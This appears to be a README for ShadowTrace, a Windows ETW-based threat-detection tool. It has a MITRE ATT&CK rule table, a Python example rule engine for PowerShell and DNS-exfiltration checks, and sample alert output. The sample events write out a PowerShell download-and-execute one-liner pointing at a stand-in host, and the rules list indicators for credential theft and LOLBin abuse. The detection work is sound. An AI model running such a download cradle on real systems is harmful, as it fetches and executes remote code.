╔════════════════════════════════════════════════════════════════╗
║ ShadowTrace — ETW Real-Time Threat Detection ║
║ Process · DNS · PowerShell · AMSI · LOLBins · Credentials ║
║ Author: mazen91111 (parasite911) · Blue/Red Team ║
╚════════════════════════════════════════════════════════════════╝
Your silent watchdog on the kernel event bus.
Monitors Windows ETW (Event Tracing for Windows) providers to detect process injection,
credential theft, LOLBins abuse, AMSI bypass attempts, and suspicious PowerShell —
all mapped to MITRE ATT&CK with severity-based alerting.
| Rule | MITRE ID | Severity | Description |
|---|---|---|---|
| Remote Thread Injection | T1055.003 | 🔴 CRITICAL | CreateRemoteThread in foreign process |
| Process Hollowing | T1055.012 | 🔴 CRITICAL | NtUnmapViewOfSection + WriteProcessMemory |
| APC Queue Injection | T1055.004 | 🟠 HIGH | QueueUserAPC targeting remote thread |
| LSASS Memory Access | T1003.001 | 🔴 CRITICAL | Process reading lsass.exe memory |
| SAM Hive Access | T1003.002 | 🟠 HIGH | Direct SAM/SECURITY registry access |
| LOLBin Execution | T1218 | 🟠 HIGH | mshta, certutil, rundll32, etc. |
| Encoded PowerShell | T1059.001 | 🟠 HIGH | -EncodedCommand, IEX, DownloadString |
| AMSI Bypass | T1562.001 | 🔴 CRITICAL | AmsiScanBuffer patching attempt |
| Registry Persistence | T1547.001 | 🟡 MEDIUM | Run key modification |
| Scheduled Task | T1053.005 | 🟡 MEDIUM | schtasks /create for persistence |
| DNS Exfiltration | T1048.003 | 🟠 HIGH | High-entropy/long DNS subdomains |

| Provider | Events |
|---|---|
| Kernel-Process | ProcessStart, ProcessStop, ImageLoad |
| Kernel-File | FileCreate, FileDelete |
| DNS-Client | DNSQuery, DNSResponse |
| PowerShell | ScriptBlockLog, CommandInvocation |
| AMSI | AMSIScan, AMSIResult |
| Security-Auditing | Logon, PrivilegeUse |
| Sysmon | ProcessCreate, NetworkConnect, RegistryEvent |
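To make the rule table concrete, here is an added example (not ShadowTrace's own code) of a small rule engine that dispatches events by provider name, as in the provider table, and applies two of the listed rules: Encoded PowerShell (T1059.001, matching the indicator strings the table names) and DNS Exfiltration (T1048.003, flagging long or high-entropy subdomains). The event dictionary shape, field names, thresholds and sample events are constructed assumptions for this illustration, not the project's ETW schema.

```python
import math
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional

# Example code, not part of ShadowTrace. Event fields ("provider", "pid",
# "script_block", "query") are assumed for illustration.


@dataclass
class Alert:
    rule: str
    mitre: str
    severity: str
    pid: int
    matched: List[str]


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character; encoded or encrypted data scores high."""
    if not s:
        return 0.0
    n = len(s)
    counts = {c: s.count(c) for c in set(s)}
    return -sum(k / n * math.log2(k / n) for k in counts.values())


# Indicator substrings for the Encoded PowerShell rule, matched case-insensitively.
POWERSHELL_INDICATORS = ["-EncodedCommand", "IEX", "Net.WebClient", "DownloadString"]


def check_powershell(event: dict) -> Optional[Alert]:
    text = event.get("script_block", "").lower()
    matched = [i for i in POWERSHELL_INDICATORS if i.lower() in text]
    if not matched:
        return None
    return Alert("Suspicious PowerShell - Encoded Command", "T1059.001", "HIGH",
                 event["pid"], matched)


# Thresholds for the DNS rule; constructed values, tune them against your own traffic.
MAX_SUBDOMAIN_LEN = 50
ENTROPY_THRESHOLD = 3.5


def check_dns(event: dict) -> Optional[Alert]:
    labels = event.get("query", "").rstrip(".").split(".")
    if len(labels) <= 2:          # bare zone, nothing to inspect
        return None
    # Naive split: last two labels are treated as the registrable zone.
    subdomain = ".".join(labels[:-2])
    matched = []
    if len(subdomain) > MAX_SUBDOMAIN_LEN:
        matched.append(f"length={len(subdomain)}")
    ent = shannon_entropy(subdomain.replace(".", ""))
    if ent > ENTROPY_THRESHOLD:
        matched.append(f"entropy={ent:.2f}")
    if not matched:
        return None
    return Alert("DNS Exfiltration - Suspicious Subdomain", "T1048.003", "HIGH",
                 event["pid"], matched)


# Dispatch table keyed by provider name, as in the provider table above.
RULES: Dict[str, Callable[[dict], Optional[Alert]]] = {
    "PowerShell": check_powershell,
    "DNS-Client": check_dns,
}


def evaluate(events: List[dict]) -> List[Alert]:
    alerts = []
    for ev in events:
        rule = RULES.get(ev["provider"])
        alert = rule(ev) if rule else None
        if alert:
            alerts.append(alert)
    return alerts


def severity_breakdown(alerts: List[Alert]) -> Dict[str, int]:
    """Counts per severity, the figure the summary screen reports."""
    counts: Dict[str, int] = {}
    for a in alerts:
        counts[a.severity] = counts.get(a.severity, 0) + 1
    return counts


# Constructed sample events: one malicious and one benign script block,
# one ordinary lookup, one over-long hex label, one short high-entropy label.
SAMPLE_EVENTS = [
    {"provider": "PowerShell", "pid": 4812,
     "script_block": "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')"},
    {"provider": "PowerShell", "pid": 1200, "script_block": "Get-ChildItem C:\\Users"},
    {"provider": "DNS-Client", "pid": 3344, "query": "www.example.com"},
    {"provider": "DNS-Client", "pid": 3344,
     "query": "4a7f2e9c1b8d6e0f3a5c7b9d1e2f4a6c8b0d2e4f6a8c0b2d4e6f8a1c3e5b7d9f.example.com"},
    {"provider": "DNS-Client", "pid": 3344,
     "query": "abcdefghijklmnopqrstuvwxyz0123456789.example.com"},
]

if __name__ == "__main__":
    for a in evaluate(SAMPLE_EVENTS):
        print(f"[{a.severity}] {a.rule} | MITRE: {a.mitre} | PID: {a.pid} | Matched: {', '.join(a.matched)}")
    print(severity_breakdown(evaluate(SAMPLE_EVENTS)))
```

The entropy check catches short encoded chunks that a pure length threshold would miss, while the length check catches low-entropy but oversized labels; real deployments should also whitelist known CDN and telemetry domains, which routinely produce long random-looking labels.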
```bash
git clone https://github.com/mazen91111/ShadowTrace.git
cd ShadowTrace
pip install -r requirements.txt
```
⚠️ Requires Windows and Administrator for ETW access.
```bash
# Start real-time threat monitoring (simulation)
python shadowtrace.py --monitor

# List all detection rules with MITRE IDs
python shadowtrace.py --list-rules

# List ETW providers and GUIDs
python shadowtrace.py --list-providers

# Monitor for 30 seconds
python shadowtrace.py --monitor --duration 30
```

Sample output:

```text
══════════════════════════════════════════════════════════════════════════
👁️ ShadowTrace — Real-Time Threat Monitor
══════════════════════════════════════════════════════════════════════════
[ LIVE EVENT STREAM ]
──────────────────────────────────────────────────────────────────────
▐ 14:23:05.12 [CRITICAL]
▐ ⚠ Process Injection — Remote Thread Creation
▐ MITRE: T1055.003 │ PID: 892 │ svchost.exe
▐ SourcePID: 4812 → TargetPID: 892 (CreateRemoteThread)
▐ Matched: CreateRemoteThread
──────────────────────────────────────────────────────────────────────
▐ 14:23:05.55 [HIGH]
▐ ⚠ Suspicious PowerShell — Encoded Command
▐ MITRE: T1059.001 │ PID: 4812 │ powershell.exe
▐ ScriptBlock: IEX (New-Object Net.WebClient).DownloadString(...)
▐ Matched: IEX, Net.WebClient, DownloadString
──────────────────────────────────────────────────────────────────────

══════════════════════════════════════════════════════════════════════════
👁️ ShadowTrace — Threat Detection Summary
══════════════════════════════════════════════════════════════════════════
Events Analyzed  : 10
Alerts Triggered : 8

[ SEVERITY BREAKDOWN ]
CRITICAL [█████████░░░░░░░░░░░░░░░░░░░░░] 3
HIGH     [████████████░░░░░░░░░░░░░░░░░░] 4
MEDIUM   [███░░░░░░░░░░░░░░░░░░░░░░░░░░░] 1

[ MITRE ATT&CK COVERAGE ]
T1003.001 ●  (1 alert)
T1055.003 ●  (1 alert)
T1059.001 ●● (2 alerts)
T1218     ●● (2 alerts)
T1562.001 ●  (1 alert)
```
Mazen Obed — @mazen91111
Threat Detection | Windows Internals | Blue Team & Red Team
For authorized security research and defense operations ONLY.
Use responsibly on systems you own or are authorized to monitor.
MIT License